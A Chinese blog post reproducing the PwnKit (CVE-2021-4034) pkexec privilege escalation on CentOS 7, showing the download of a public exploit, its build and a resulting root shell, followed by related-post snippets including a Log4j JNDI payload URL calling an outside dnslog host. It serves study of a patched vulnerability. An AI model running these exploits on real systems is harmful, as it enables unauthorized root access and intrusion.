【漏洞复现】利用CVE-2021-4034对Linux提权

已于 2024-05-15 21:35:29 修改
阅读量855 收藏
点赞数 2
分类专栏: 安全攻防(2024暂停更新) 文章标签: linux 运维 网络
于 2024-05-07 21:18:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46022776/article/details/138545902
版权

介绍

CVE-2021-4034存在于Polkit的pkexec中,pkexec是一个类似sudo的SUID root程序,允许授权用户作为其它用户执行程序,如未指定程序则运行默认shell,如果未指定用户名,则将作为管理员用户root执行。该漏洞自2009年5月起便已经存在,受影响的Linux发行版包括Ubuntu、Debian、Fedora、CentOS等。
【已解决】目前各发行版最新版本以及Polkit最新版本均已修复,请立即更新系统版本或Polkit版本。

环境准备

下载CentOS-7-x86_64-DVD-1804.iso
https://codeload.github.com/berdav/CVE-2021-4034/zip/refs/heads/main

提权复现

在这里插入图片描述

[cps@localhost ~]$ id cps
uid=1001(cps) gid=1001(cps) groups=1001(cps)
[cps@localhost ~]$ uname -r
3.10.0-862.el7.x86_64
[cps@localhost ~]$ uname -a
Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Fri Apr 20 16:44:24 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[cps@localhost ~]$ cd Desktop/
[cps@localhost Desktop]$ ls
CVE-2021-4034-main.zip
[cps@localhost Desktop]$ unzip CVE-2021-4034-main.zip 
Archive:  CVE-2021-4034-main.zip
55d60e381ef90463ed35f47af44bf7e2fbc150d4
   creating: CVE-2021-4034-main/
  inflating: CVE-2021-4034-main/.gitignore  
  inflating: CVE-2021-4034-main/LICENSE  
  inflating: CVE-2021-4034-main/Makefile  
  inflating: CVE-2021-4034-main/README.md  
  inflating: CVE-2021-4034-main/cve-2021-4034.c  
  inflating: CVE-2021-4034-main/cve-2021-4034.sh  
   creating: CVE-2021-4034-main/dry-run/
  inflating: CVE-2021-4034-main/dry-run/Makefile  
  inflating: CVE-2021-4034-main/dry-run/dry-run-cve-2021-4034.c  
  inflating: CVE-2021-4034-main/dry-run/pwnkit-dry-run.c  
  inflating: CVE-2021-4034-main/pwnkit.c  
[cps@localhost Desktop]$ cd CVE-2021-4034-main/
[cps@localhost CVE-2021-4034-main]$ ls
cve-2021-4034.c  cve-2021-4034.sh  dry-run  LICENSE  Makefile  pwnkit.c  README.md
[cps@localhost CVE-2021-4034-main]$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
[cps@localhost CVE-2021-4034-main]$ ls
cve-2021-4034    cve-2021-4034.sh  gconv-modules  LICENSE   pwnkit.c   README.md
cve-2021-4034.c  dry-run           GCONV_PATH=.   Makefile  pwnkit.so
[cps@localhost CVE-2021-4034-main]$ whoami
cps
[cps@localhost CVE-2021-4034-main]$ id cps
uid=1001(cps) gid=1001(cps) groups=1001(cps)
[cps@localhost CVE-2021-4034-main]$ ./cve-2021-4034
sh-4.2# whoami
root
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),1001(cps) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2#

附:参考文档

https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
https://ubuntu.com/security/CVE-2021-4034
https://access.redhat.com/security/cve/CVE-2021-4034
https://security-tracker.debian.org/tracker/CVE-2021-4034

漏洞复现CVE-2021-4034 pkexec漏洞
李火火的安全圈
02-10 3043
文章目录声明一、漏洞概述二、影响范围三、本地环境复现四、修补建议总结漏洞原理深层剖析 声明 本文章仅用于学习和技术研究,切勿用于非授情况下的攻击测试行为,如因此产生的一切不良后果与文章作者无关!!! 一、漏洞概述 Linux Polkit 的 pkexec程序中发现了一个本地漏洞。pkexec应用程序是一个 setuid 工具,旨在允许非特用户根据预定义的策略以特用户身份运行命令。 由于当前版本的 pkexec 无法正确处理调用参数计数,并最终会尝试将环境变量作为命令执行。 攻击者可以通
CVE-2021-4034Linux Polkit 漏洞复现及修复
Mr_atopos的博客
06-16 3576
CVE-2021-4034 漏洞复现及修复
Linux polkit本地(CVE-2021-4034)漏洞修复方案
最新发布
AoiMukou01的博客
03-21 774
Polkit是一个在类Unix操作系统中控制系统范围限的组件,pkexec是Polkit的一部分,允许非特用户根据预定义的策略以特用户身份运行命令。policykit-1_0.105-14.1ubuntu0.5+esm1_amd64.deb演示​​​​​​​​​​​​​​。在完成升级后,使用漏洞利用工具尝试,未产生任何效果,表明漏洞已成功修复。验证升级完成,已更新至安全版本​​​​​​​​​​​​​​。验证升级完成,已更新至安全版本​​​​​​​。版本检测,不在漏洞影响范围内。
CVE-2021-4034Linux Polkit 漏洞复现及修复
热门推荐
一只爱吃橙子的羊
01-27 2万+
本文仅为验证漏洞,在本地环境测试验证,无其它目的 CVE 编号: CVE-2021-4034 漏洞说明: 近期,国外安全研究团队在 polkit 的 pkexec 中发现存在的本地漏洞CVE-2021-4034) 关于 Polkit pkexec for Linux Polkit(以前称为 PolicyKit)是一个用于在类 Unix 操作系统中控制系统范围限的组件。它为非特进程与特进程通信供了一种有组织的方式。也可以使用 polkit 执行具有限的命令,使用命令 pkexec 后
CVE-2021-4034漏洞复现
m0_66299232的博客
10-15 1761
当前版本的pkexec中没有正确处理参数和环境变量,导致攻击者可以利用这个Bug劫持环境变量`GCONV_PATH`,进而劫持动态链接库,以root身份执行任意代码。因为这个漏洞不是存在于一个服务中,所以Vulhub只是供了一个包含Polkit(PolicyKit)v0.105版本套件的Ubuntu。Polkit(之前名为PolicyKit)是一个限相关的套件,pkexec是其中用于以其他用户身份执行命令的工具,它具有suid限。./cve-2021-4034 //执行后,成功。
CVE-2021-4034漏洞复现
Websec
02-19 3922
1、漏洞POC https://github.com/berdav/CVE-2021-4034 2、漏洞复现 下载poc-编译代码-执行exp即可。 git clone GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1day make ./cve-2021-4034
CVE-2021-4034复现
m0_46607055的博客
01-28 478
漏洞分析 问题出在 pkexec 命令命令基本格式 pkexec [--user username] program 其含义,以指定用户身份 运行 文件,默认则为root 正常使用,是需要输入密码的。 在 main 函数里,如果传入的命令不是绝对路径,就会在 PATH 环境变量的目录里搜索。 在 534 行的 for 循环从下标 1 开始遍历 argv[]。但 Linux 里 argv 允许只包含一个元素,就是使用 execve 并给 argv 传入 {0},此时 argc 就是
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041)是由于 OpenSSH 在处理会话资源时存在错误,攻击者可以利用漏洞来 crash 或者控制 OpenSSH 服务器。该漏洞影响了 OpenSSH 服务器的稳定性和安全性。 二、影响 如果攻击...
CVE-2021-21315v2
05-07
CVE-2021-21315系统信息 这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()...
DirtyCow漏洞复现CVE-2016-5195)1
08-08
2. **漏洞复现步骤**: - 首先,你需要在靶机上创建一个新的用户,例如`test`,使用`useradd test`命令- 接下来,切换到`test`用户,使用`su test`命令- 然后,你需要获取 Dirty Cow 的漏洞利用程序。这...
CVE-2021-4034
02-06
CVE-2021-4034
CVE-2021-4034漏洞
qq_50902091的博客
06-28 726
1.从GitHub上下载已有的CVE-2021-4034-main.zip压缩包,然后复制进centos7,通过在终端输入命令:“unzip CVE-2021-4034-main.zip”对该文件进行解压。5.就可以进行本地。输入执行命令:“./cve-2021-4034”,就可以进入root限,通过whoami来查看是否为root用户。2.cd进入CVE-2021-4034-main,会发现有一个makefile。3.利用源码安装,输入命令:make,来安装cve-01-4034
CVE-2021-4034:pkexec本地
Fly_鹏程万里
01-27 3253
影响范围 Polkit Pkexec 漏洞类型 本地利用条件 影响范围应用 漏洞概述 Polkit是一个应用程序级别的工具集,通过定义和审核限规则,实现不同优先级进程间的通讯,控制决策集中在统一的框架之中,决定低优先级进程是否有访问高优先级进程 Polkit在系统层级进行限控制,供了一个低优先级进程和高优先级进程进行通讯的系统,它和sudo等程序不同,Polkit并没有赋予进程完全的root限,而是通过一个集中的策略系统进行更精细的授,这个漏洞是本地触发,只有在获得有限
CVE-2021-4034漏洞攻击案例(
weixin_50281314的博客
07-22 704
CVE-2021-4034漏洞攻击案例(
CVE-2021-4034:Polkit漏洞利用工具教程
gitblog_00138的博客
08-08 437
CVE-2021-4034:Polkit漏洞利用工具教程 CVE-2021-4034CVE-2021-4034 1day项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2021-4034 项目介绍 CVE-2021-4034 是一个影响多款Linux发行版的本地漏洞,存在于PolicyKit(Polkit)的pkexec组件中。此漏洞允许非特...
cve-2021-4034修复和复现方法
段帅星的博客
01-29 9991
** 一、cve-2021-4034问题背景 ** 关于 Polkit pkexec for Linux Polkit(以前称为 PolicyKit)是一个用于在类 Unix 操作系统中控制系统范围限的组件。它为非特进程与特进程通信供了一种有组织的方式。也可以使用 polkit 执行具有限的命令,使用命令 pkexec 后要执行的命令(具有 root 限)。 PwnKit 漏洞的潜在影响 成功利用漏洞允许任何非特用户在易受攻击的主机上获得 root 特。Qualys 安全研究人员已经能
cve-2021-44228漏洞复现分析
03-03
### CVE-2021-44228 漏洞复现分析 #### Log4j 的介绍 Log4j 是一个广泛使用的Java日志记录库,由Apache软件基金会开发。该库允许开发者通过配置文件灵活控制日志信息的格式、级别以及输出位置。 #### 漏洞概述 CVE-2021-44228是一个存在于Log4j 2.x系列中的严重远程代码执行漏洞。当应用程序使用了受影响版本的日志组件并处理特定模式字符串时,攻击者可以构造恶意输入触发JNDI注入,从而实现任意代码执行或敏感数据泄露[^1]。 #### 复现环境准备 为了安全地研究此漏洞,在隔离环境中搭建测试平台至关重要。通常情况下,这涉及到安装适当的操作系统镜像(如Kali Linux),确保已安装Java Development Kit (JDK),因为目标应用依赖于它来运行。具体来说,对于本案例而言,建议采用JDK 1.8版本[^2]。 #### 构建利用场景 构建模拟攻击的第一步是从GitHub仓库获取专门为此目的设计的工具集——`bkfish/Apache-Log4j-Learning`项目供了详细的指南和必要的脚本支持。这些资源可以帮助研究人员快速设置好实验条件,并验证不同条件下漏洞的表现形式。 #### 利用方式实例化 一种常见的利用方法是在请求参数中嵌入特殊格式化的字符串表达式`${...}`,其中包含了指向外部LDAP服务器的数据源描述符。例如,向Solr服务发送如下所示的核心管理命令: ```bash http://target/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ib1ozt.dnslog.cn} ``` 这里`${sys:java.version}`会解析成当前系统的Java版本号作为子域名的一部分传递给DNS查询,以此证明存在潜在的安全风险[^4]。 #### 受影响范围确认 一旦成功触发漏洞,可以通过监控网络流量或者查看响应报文中携带的信息判断是否存在异常行为。比如观察到DNS请求中含有预期之外的内容,则表明可能已经遭受了非法入侵尝试;反之如果没有明显的迹象则说明防护措施有效阻止了威胁的发生。 #### 安全加固建议 针对此类高危级别的零日缺陷,官方及时发布了补丁程序修复问题所在之处。因此强烈推荐用户尽快升级至最新稳定版Log4j以消除隐患。除此之外,还应考虑采取其他辅助性的防御策略,诸如限制对外部资源加载限、启用严格的输入校验机制等手段进一步增强安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值